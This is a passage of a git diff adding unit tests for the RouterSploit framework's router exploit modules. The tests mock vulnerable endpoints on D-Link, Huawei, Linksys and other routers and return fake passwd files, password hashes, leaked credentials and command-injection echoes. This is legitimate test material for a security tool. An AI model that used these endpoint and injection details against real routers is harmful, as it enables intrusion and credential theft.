"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/comtrend/__init__.py b/tests/exploits/routers/comtrend/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/comtrend/test_ct_5361t_password_disclosure.py b/tests/exploits/routers/comtrend/test_ct_5361t_password_disclosure.py new file mode 100644 index 000000000..8aea763a5 --- /dev/null +++ b/tests/exploits/routers/comtrend/test_ct_5361t_password_disclosure.py @@ -0,0 +1,21 @@ +from routersploit.modules.exploits.routers.comtrend.ct_5361t_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/password.cgi", methods=["GET"]) + route_mock.return_value = ( + "test" + "pwdAdmin = 'QWRtaW4=';" + "pwdSupport = 'QWRtaW4=';" + "pwdUser = 'QWRtaW4=';" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/__init__.py b/tests/exploits/routers/dlink/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/dlink/test_dir_300_320_600_615_info_disclosure.py b/tests/exploits/routers/dlink/test_dir_300_320_600_615_info_disclosure.py new file mode 100644 index 000000000..9b2c1a977 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_300_320_600_615_info_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.dlink.dir_300_320_600_615_info_disclosure import Exploit + + +def test_exploit_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/model/__show_info.php", methods=["GET"]) + route_mock.return_value = ( + "test" + "\n\t\t\tadmin:Password1234\n\n\t\t\t" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_300_320_615_auth_bypass.py b/tests/exploits/routers/dlink/test_dir_300_320_615_auth_bypass.py new file mode 100644 index 000000000..c818b3200 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_300_320_615_auth_bypass.py @@ -0,0 +1,17 @@ +from routersploit.modules.exploits.routers.dlink.dir_300_320_615_auth_bypass import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/bsc_lan.php", methods=["GET"]) + route_mock.return_value = ( + '' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is False + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_300_600_rce.py b/tests/exploits/routers/dlink/test_dir_300_600_rce.py new file mode 100644 index 000000000..2417a7488 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_300_600_rce.py @@ -0,0 +1,23 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.dlink.dir_300_600_rce import Exploit + + +def apply_response(*args, **kwargs): + data = "TEST" + request.form['cmd'] + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.dlink.dir_300_600_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/command.php", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_645_815_rce.py b/tests/exploits/routers/dlink/test_dir_645_815_rce.py new file mode 100644 index 000000000..45d8954e1 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_645_815_rce.py @@ -0,0 +1,19 @@ +from unittest import mock +from routersploit.modules.exploits.routers.dlink.dir_645_815_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.dlink.dir_645_815_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/diagnostic.php", methods=["POST"]) + route_mock.return_value = ( + "OK" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_645_password_disclosure.py b/tests/exploits/routers/dlink/test_dir_645_password_disclosure.py new file mode 100644 index 000000000..8a51eef54 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_645_password_disclosure.py @@ -0,0 +1,61 @@ +from routersploit.modules.exploits.routers.dlink.dir_645_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/getcfg.php", methods=["POST"]) + route_mock.return_value = ( + """ + + + + DEVICE.ACCOUNT + + DIR-645 + + + 2 + 2 + 2 + + USR- + admin + + 0920983386 + 0 + + + + USR-1 + user + + 3616441 + 101 + + + + + + + 0 + + + 0 + + 600 + 128 + 16 + + + + + """ + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_825_path_traversal.py b/tests/exploits/routers/dlink/test_dir_825_path_traversal.py new file mode 100644 index 000000000..76c137569 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_825_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.routers.dlink.dir_825_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/apply.cgi", methods=["POST"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_850l_hedwig_lfi.py b/tests/exploits/routers/dlink/test_dir_850l_hedwig_lfi.py new file mode 100644 index 000000000..689e4a7ee --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_850l_hedwig_lfi.py @@ -0,0 +1,55 @@ +#from routersploit.modules.exploits.routers.dlink.dir_850l_hedwig_lfi import Exploit + + +def test_check_success(target): + return + + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/hedwig.cgi", methods=["POST"]) + cgi_mock.return_value = ( + "" + "" + "" + "DIR-850L" + "" + "1" + "2" + "1" + "" + "USR-" + "Admin" + "" + "92830535" + "0" + "" + "" + "" + "" + "" + "" + "0" + "" + "" + "0" + "" + "180" + "128" + "16" + "" + "" + "" + "" + "" + "OK" + "" + "No modules for Hedwig" + "" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_info_disclosure.py b/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_info_disclosure.py new file mode 100644 index 000000000..c9a2e75f9 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_info_disclosure.py @@ -0,0 +1,267 @@ +from flask import request +#from routersploit.modules.exploits.routers.dlink.dir_8xx_auth_bypass_info_disclosure import Exploit + + +def apply_response(): + """ Response for exploit requests """ + + if "A" not in request.args.keys(): + response = "
Authentication Fail!
" + else: + response = """ + + + + + +

Version

+
+
+ Firmware External Version : + V1.13 +
+ +
+ Firmware Internal Version : + V1.13b03 +
+ + +
+ Date : + 29, Nov, 2016 +
+
+ CheckSum : + +
+
+ 2.4GHz regulation domain : + + EU
  1,2,3,4,5,6,7,8,9,10,11,12,13 +
+
+
+ 5GHz country code : + + EU/GB
  36,40,44,48, +
+
+
+ 5GHz DFS Channel : + + +
+ + + +
+ Firmware Query : + +
+ + +
+ LAN MAC : + 10:62:eb:99:e9:5c +
+ +
+ 2.4GHz WLAN MAC : + 10:62:eb:99:e9:5c +
+
+ 5GHz WLAN MAC : + + 10:62:eb:99:e9:5e +
+ +
+ SSID (2.4G) : +
dlink-E95C
+
+
+ SSID (5G) : +
dlink-E95C
+
+ +
+ Factory Default : + +
+
+
+ + + + +
+
+ + + +""" + return response, 200 + + +def test_exploit_successful(target): + return + """ Test scenario - successful exploitation """ + + cgi_mock = target.get_route_mock("/version.php", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_password_disclosure.py b/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_password_disclosure.py new file mode 100644 index 000000000..4f007d252 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dir_8xx_auth_bypass_password_disclosure.py @@ -0,0 +1,65 @@ +from flask import request +#from routersploit.modules.exploits.routers.dlink.dir_8xx_auth_bypass_password_disclosure import Exploit + + +def apply_response(): + if "A" not in request.args.keys(): + response = """ + + + FAILED + Not authorized + + """ + else: + response = """ + + + + DEVICE.ACCOUNT + + + + 2 + 1 + + + Admin + + RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR + 0 + + + + + + + 0 + + + 0 + + 300 + 128 + 16 + + + + +""" + return response, 200 + + +def test_exploit_success(target): + return + + """ Test scenario - successful exploitation """ + + cgi_mock = target.get_route_mock("/getcfg.php", methods=["GET", "POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() diff --git a/tests/exploits/routers/dlink/test_dlink_auth_bypass.py b/tests/exploits/routers/dlink/test_dlink_auth_bypass.py new file mode 100644 index 000000000..a37615060 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dlink_auth_bypass.py @@ -0,0 +1,23 @@ +#from routersploit.modules.exploits.routers.dlink.dlink_auth_bypass import Exploit + + +def test_check_success(target): + return + + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/", methods=["GET"]) + cgi_mock.return_value = ( + "test" + "Home/bsc_internet.htm" + "test" + "/public/logout.htm" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dns_320l_327l_rce.py b/tests/exploits/routers/dlink/test_dns_320l_327l_rce.py new file mode 100644 index 000000000..0215991d1 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dns_320l_327l_rce.py @@ -0,0 +1,31 @@ +from unittest import mock +import ast +import re +from flask import request +from routersploit.modules.exploits.routers.dlink.dns_320l_327l_rce import Exploit + + +def apply_response(*args, **kwargs): + inj = request.args["f_gaccount"] + res = re.findall("\$\(\((.*-1)\)\)", inj) + data = "TEST" + if res: + solution = ast.literal_eval(res[0]) + data += str(solution) + + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.dlink.dns_320l_327l_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/gdrive.cgi", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dsl_2730_2750_path_traversal.py b/tests/exploits/routers/dlink/test_dsl_2730_2750_path_traversal.py new file mode 100644 index 000000000..80f525eeb --- /dev/null +++ b/tests/exploits/routers/dlink/test_dsl_2730_2750_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.routers.dlink.dsl_2730_2750_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dsl_2750b_info_disclosure.py b/tests/exploits/routers/dlink/test_dsl_2750b_info_disclosure.py new file mode 100644 index 000000000..54f78c92c --- /dev/null +++ b/tests/exploits/routers/dlink/test_dsl_2750b_info_disclosure.py @@ -0,0 +1,21 @@ +from routersploit.modules.exploits.routers.dlink.dsl_2750b_info_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + cgi_mock = target.get_route_mock("/hidden_info.html", methods=["GET"]) + cgi_mock.return_value = ( + "TEST" + "PassPhrase" + "TEST" + "SSID" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dsl_2750b_rce.py b/tests/exploits/routers/dlink/test_dsl_2750b_rce.py new file mode 100644 index 000000000..0bd72fc3f --- /dev/null +++ b/tests/exploits/routers/dlink/test_dsl_2750b_rce.py @@ -0,0 +1,36 @@ +from unittest import mock +from routersploit.modules.exploits.routers.dlink.dsl_2750b_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.dlink.dsl_2750b_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful exploitation """ + + route_mock1 = target.get_route_mock("/login.cgi", methods=["GET"]) + route_mock1.return_value = ( + "TEST" + ) + + route_mock2 = target.get_route_mock("/ayefeaturesconvert.js", methods=["GET"]) + route_mock2.return_value = ( + """ + (..) + var AYECOM_PRIVATE="private"; + var AYECOM_AREA="EU"; + var AYECOM_FWVER="1.01"; + var AYECOM_HWVER="D1"; + var AYECOM_PRIVATEDIR="private"; + var AYECOM_PROFILE="DSL-2750B"; + var FIRST_HTML=""; + var BUILD_GUI_VERSIOIN_EU="y"; + // BUILD_GUI_VERSIOIN_AU is not s + (..) + """ + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dsp_w110_rce.py b/tests/exploits/routers/dlink/test_dsp_w110_rce.py new file mode 100644 index 000000000..49a0e42b8 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dsp_w110_rce.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import Response +from routersploit.modules.exploits.routers.dlink.dsp_w110_rce import Exploit + + +def apply_response(*args, **kwargs): + resp = Response("Test") + resp.headers['Server'] = 'lighttpd/1.4.34' + return resp + + +@mock.patch("routersploit.modules.exploits.routers.dlink.dsp_w110_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dvg_n5402sp_path_traversal.py b/tests/exploits/routers/dlink/test_dvg_n5402sp_path_traversal.py new file mode 100644 index 000000000..0d022362a --- /dev/null +++ b/tests/exploits/routers/dlink/test_dvg_n5402sp_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.routers.dlink.dvg_n5402sp_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["POST"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dwl_3200ap_password_disclosure.py b/tests/exploits/routers/dlink/test_dwl_3200ap_password_disclosure.py new file mode 100644 index 000000000..13571bd33 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dwl_3200ap_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.dlink.dwl_3200ap_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "RpWebID=a3b21ada\n" + "TEST" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_dwr_932_info_disclosure.py b/tests/exploits/routers/dlink/test_dwr_932_info_disclosure.py new file mode 100644 index 000000000..a017593c2 --- /dev/null +++ b/tests/exploits/routers/dlink/test_dwr_932_info_disclosure.py @@ -0,0 +1,17 @@ +from routersploit.modules.exploits.routers.dlink.dwr_932_info_disclosure import Exploit + + +def test_exploit_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/cgi-bin/dget.cgi", methods=["GET"]) + route_mock.return_value = ( + '{ "wifi_AP1_ssid": "dlink-DWR-932", "wifi_AP1_hidden": "0", "wifi_AP1_passphrase": "MyPaSsPhRaSe", "wifi_AP1_passphrase_wep": "", "wifi_AP1_security_mode": "3208,8", "wifi_AP1_enable": "1", "get_mac_filter_list": "", "get_mac_filter_switch": "0", "get_client_list": "9c:00:97:00:a3:b3,192.168.0.45,IT-PCs,0>40:b8:00:ab:b8:8c,192.168.0.43,android-b2e363e04fb0680d,0", "get_mac_address": "c4:00:f5:00:ec:40", "get_wps_dev_pin": "", "get_wps_mode": "0", "get_wps_enable": "0", "get_wps_current_time": "" }' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_multi_hedwig_cgi_exec.py b/tests/exploits/routers/dlink/test_multi_hedwig_cgi_exec.py new file mode 100644 index 000000000..39fff2d22 --- /dev/null +++ b/tests/exploits/routers/dlink/test_multi_hedwig_cgi_exec.py @@ -0,0 +1,25 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.dlink.multi_hedwig_cgi_exec import Exploit + + +def apply_response(*args, **kwargs): + res = request.headers["Cookie"] + data = "TEST" + res + + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.dlink.multi_hedwig_cgi_exec.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/hedwig.cgi", methods=["POST"]) + cgi_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_multi_hnap_rce.py b/tests/exploits/routers/dlink/test_multi_hnap_rce.py new file mode 100644 index 000000000..89e81d59b --- /dev/null +++ b/tests/exploits/routers/dlink/test_multi_hnap_rce.py @@ -0,0 +1,22 @@ +from unittest import mock +from routersploit.modules.exploits.routers.dlink.multi_hnap_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.dlink.multi_hnap_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/HNAP1/", methods=["GET"]) + route_mock.return_value = ( + "TEST" + "SOAPActions" + "TEST" + "D-Link" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/dlink/test_multi_hnap_rce_exploit.py b/tests/exploits/routers/dlink/test_multi_hnap_rce_exploit.py new file mode 100644 index 000000000..0d4b33cec --- /dev/null +++ b/tests/exploits/routers/dlink/test_multi_hnap_rce_exploit.py @@ -0,0 +1,33 @@ +from flask import request +#from routersploit.modules.exploits.routers.dlink.multi_hnap_rce_exploit import Exploit + +payload = None + +def apply_response(*args, **kwargs): + global payload + payload = request.headers['SOAPAction'] + + return "TEST", 200 + +def response_func(*args, **kwargs): + global payload + return payload, 200 + +def test_check_success(target): + return + + """ Test scenario - successful check """ + + global payload + cgi_mock1 = target.get_route_mock("/HNAP1/", methods=["POST"]) + cgi_mock1.side_effect = apply_response + + cgi_mock2 = target.get_route_mock("/HNAP1/", methods=["GET"]) + cgi_mock2.side_effect = response_func + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/huawei/__init__.py b/tests/exploits/routers/huawei/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/huawei/test_e5331_mifi_info_disclosure.py b/tests/exploits/routers/huawei/test_e5331_mifi_info_disclosure.py new file mode 100644 index 000000000..edcec23cc --- /dev/null +++ b/tests/exploits/routers/huawei/test_e5331_mifi_info_disclosure.py @@ -0,0 +1,31 @@ +from routersploit.modules.exploits.routers.huawei.e5331_mifi_info_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/api/wlan/security-settings", methods=["GET"]) + route_mock.return_value = ( + '' + '' + 'WPA2-PSK' + 'NONE' + 'AES' + '12345' + '12345' + '12345' + '12345' + '1' + 'XXXXX' + '0' + '1' + '1' + '' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/huawei/test_hg530_hg520b_password_disclosure.py b/tests/exploits/routers/huawei/test_hg530_hg520b_password_disclosure.py new file mode 100644 index 000000000..039d84dde --- /dev/null +++ b/tests/exploits/routers/huawei/test_hg530_hg520b_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.huawei.hg530_hg520b_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/UD/", methods=["POST"]) + cgi_mock.return_value = ( + 'TEST' + 'Admin1234' + 'TEST' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/huawei/test_hg866_password_change.py b/tests/exploits/routers/huawei/test_hg866_password_change.py new file mode 100644 index 000000000..5a60f5193 --- /dev/null +++ b/tests/exploits/routers/huawei/test_hg866_password_change.py @@ -0,0 +1,21 @@ +from routersploit.modules.exploits.routers.huawei.hg866_password_change import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/html/password.html", methods=["GET"]) + route_mock.return_value = ( + 'TEST' + 'psw' + 'TEST' + 'reenterpsw' + 'TEST' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/ipfire/__init__.py b/tests/exploits/routers/ipfire/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/ipfire/test_ipfire_proxy_rce.py b/tests/exploits/routers/ipfire/test_ipfire_proxy_rce.py new file mode 100644 index 000000000..e058fb5d1 --- /dev/null +++ b/tests/exploits/routers/ipfire/test_ipfire_proxy_rce.py @@ -0,0 +1,23 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.ipfire.ipfire_proxy_rce import Exploit + + +def apply_response(*args, **kwargs): + data = request.form["NCSA_PASS"] + "" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.ipfire.ipfire_proxy_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/proxy.cgi", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/ipfire/test_ipfire_shellshock.py b/tests/exploits/routers/ipfire/test_ipfire_shellshock.py new file mode 100644 index 000000000..8d3f515c2 --- /dev/null +++ b/tests/exploits/routers/ipfire/test_ipfire_shellshock.py @@ -0,0 +1,23 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.ipfire.ipfire_shellshock import Exploit + + +def apply_response(*args, **kwargs): + data = "TEST" + request.headers["VULN"] + "TEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.ipfire.ipfire_shellshock.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/index.cgi", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/linksys/__init__.py b/tests/exploits/routers/linksys/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py b/tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py new file mode 100644 index 000000000..620b83308 --- /dev/null +++ b/tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py @@ -0,0 +1,17 @@ +from routersploit.modules.exploits.routers.linksys.smartwifi_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock= target.get_route_mock("/.htpasswd", methods=["GET"]) + route_mock.return_value = ( + 'admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/linksys/test_wap54gv3_rce.py b/tests/exploits/routers/linksys/test_wap54gv3_rce.py new file mode 100644 index 000000000..246eb123a --- /dev/null +++ b/tests/exploits/routers/linksys/test_wap54gv3_rce.py @@ -0,0 +1,23 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.linksys.wap54gv3_rce import Exploit + + +def apply_response(*args, **kwargs): + data = "TESTTEST" + return data, 200 + + +@mock.patch("routersploit.modules.exploits.routers.linksys.wap54gv3_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/debug.cgi", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/linksys/test_wrt100_110_rce.py b/tests/exploits/routers/linksys/test_wrt100_110_rce.py new file mode 100644 index 000000000..e61519b2b --- /dev/null +++ b/tests/exploits/routers/linksys/test_wrt100_110_rce.py @@ -0,0 +1,21 @@ +from unittest import mock +from routersploit.modules.exploits.routers.linksys.wrt100_110_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.linksys.wrt100_110_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/HNAP1/", methods=["GET"]) + route_mock.return_value = ( + 'test' + 'WRT110' + 'test' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/movistar/__init__.py b/tests/exploits/routers/movistar/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/movistar/test_adsl_router_bhs_rta_path_traversal.py b/tests/exploits/routers/movistar/test_adsl_router_bhs_rta_path_traversal.py new file mode 100644 index 000000000..f7f2cf007 --- /dev/null +++ b/tests/exploits/routers/movistar/test_adsl_router_bhs_rta_path_traversal.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.movistar.adsl_router_bhs_rta_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["GET"]) + route_mock.return_value = ( + "#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::" + "#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git 